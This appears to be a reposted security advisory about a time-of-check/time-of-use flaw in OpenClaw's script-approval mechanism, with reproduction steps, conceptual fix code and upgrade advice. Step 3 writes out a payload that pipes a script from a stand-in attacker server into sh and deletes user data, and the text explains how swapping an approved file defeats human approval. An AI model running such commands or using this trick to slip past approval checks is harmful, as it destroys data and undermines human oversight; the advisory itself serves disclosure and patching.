Listen to this Post
The vulnerability resides in OpenClaw’s `system.run` approval mechanism, which fails to bind the content of mutable interpreter-style script files (like `.sh` scripts) to the approval decision. When a user approves an execution such as sh ./script.sh, the system only approves the command shape (sh and `./script.sh` as an argument), not the actual content of script.sh. An attacker with the ability to write to the script file after approval but before execution can replace its content with malicious commands. The approved `argv` values remain identical (sh, ./script.sh), satisfying the approval check, but the interpreter executes the modified, malicious script content. The initially vulnerable version 2026.3.7 allowed this drift for shell scripts. A partial fix on March 7, 2026 (c76d292) addressed shell scripts but missed `bun` and `deno` runtimes. The complete fix on March 9, 2026 (cf3a479) binds approved script operands by taking on-disk file snapshots for all interpreters, denying execution if the file content has drifted post-approval .
dailycve form:
Platform: OpenClaw npm
Version: <= 2026.3.7
Vulnerability: Mutable script drift
Severity: Critical
Date: March 7 2026
Prediction: March 9 2026
What Undercode Say:
Analytics
The vulnerability is a classic Time-of-Check to Time-of-Use (TOCTOU) flaw (CWE-367). It exploits the separation between approval and execution phases, targeting the content of files rather than their paths. The initial fix on March 7 created a narrow bypass for `bun` and `deno` runtimes, which was only discovered during a maintainer review on March 8. The complete patch on March 9 implements snapshot binding for all interpreter operands, indicating a shift from trusting file paths to trusting file content hashes .
Bash Commands and Code (Reproduction Steps)
The following demonstrates the attack chain on a vulnerable system (OpenClaw <= 2026.3.7). It assumes the attacker can write to the script file after approval.
1. Attacker creates an initial benign script that will be approved cat > ./script.sh << 'EOF' !/bin/sh echo "Running benign operation..." EOF chmod +x ./script.sh 2. The system approves the execution (simulated API call) This approval is for the command: ["sh", "./script.sh"] In a real attack, this would be triggered via social engineering or API misuse. 3. Before the approved execution actually runs, the attacker replaces the script content cat > ./script.sh << 'EOF' !/bin/sh Malicious payload curl -s http://attacker-server/malware.sh | sh rm -rf /home/user/data echo "System compromised" EOF 4. The previously approved command "sh ./script.sh" executes The system sees the same argv (sh, ./script.sh), approves it, but runs the new malicious content sh ./script.sh Output: System compromised
The Complete Fix (Snapshot Binding – Conceptual Code)
The patch in commit `cf3a479` likely implements logic similar to this pseudocode:
// Before execution
function executeApprovedCommand(approvedCommand, scriptPath) {
// Take a snapshot/hash of the file at approval time
const approvalSnapshot = approvedCommand.fileSnapshot;
// At execution time, verify the file hasn't changed
const currentFileHash = calculateFileHash(scriptPath);
if (currentFileHash !== approvalSnapshot) {
throw new Error("Execution denied: Script content has drifted since approval.");
}
// Proceed with safe execution
exec(approvedCommand.argv);
}
How Exploit
- Initiation: The attacker presents or triggers a benign command requiring approval, e.g.,
sh ./backup.sh. The user approves it. - Manipulation: Between the approval and the scheduled execution, the attacker (who has write access to the file) overwrites `backup.sh` with malicious commands, such as a data exfiltration script.
- Execution: The `system.run` module executes the approved command shape (
sh ./backup.sh). Since the `argv` values are identical, the approval check passes, but the shell now interprets the new malicious file content. - Bypass Expansion (v2026.3.7): After the partial fix, the same logic was found applicable to `bun run ./script.ts` and
deno run ./script.ts, where the mutable TypeScript/JavaScript source files could be swapped post-approval .
Protection from this CVE
- Immediate Upgrade: Update the `openclaw` npm package to version `2026.3.8` or later.
npm install [email protected]
- Verify Installation: Ensure the fix commit `cf3a479bd1204f62eef7dd82b4aa328749ae6c91` is present.
- File System Controls: Implement strict access controls on directories containing executable scripts. Ensure that users who can trigger approvals cannot also write to the script files.
- Monitoring: Monitor for file modifications on scripts immediately following an approval event .
Impact
- Confidentiality: An attacker can read arbitrary files on the node host by replacing an approved script with one that reads and exfiltrates data.
- Integrity: Arbitrary system commands can be executed, allowing modification of system state, configuration files, or application data.
- Availability: Malicious scripts can delete critical files, stop services, or degrade system performance.
- Scope: The impact is high as it bypasses the human-in-the-loop approval workflow, rendering the primary security control ineffective .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
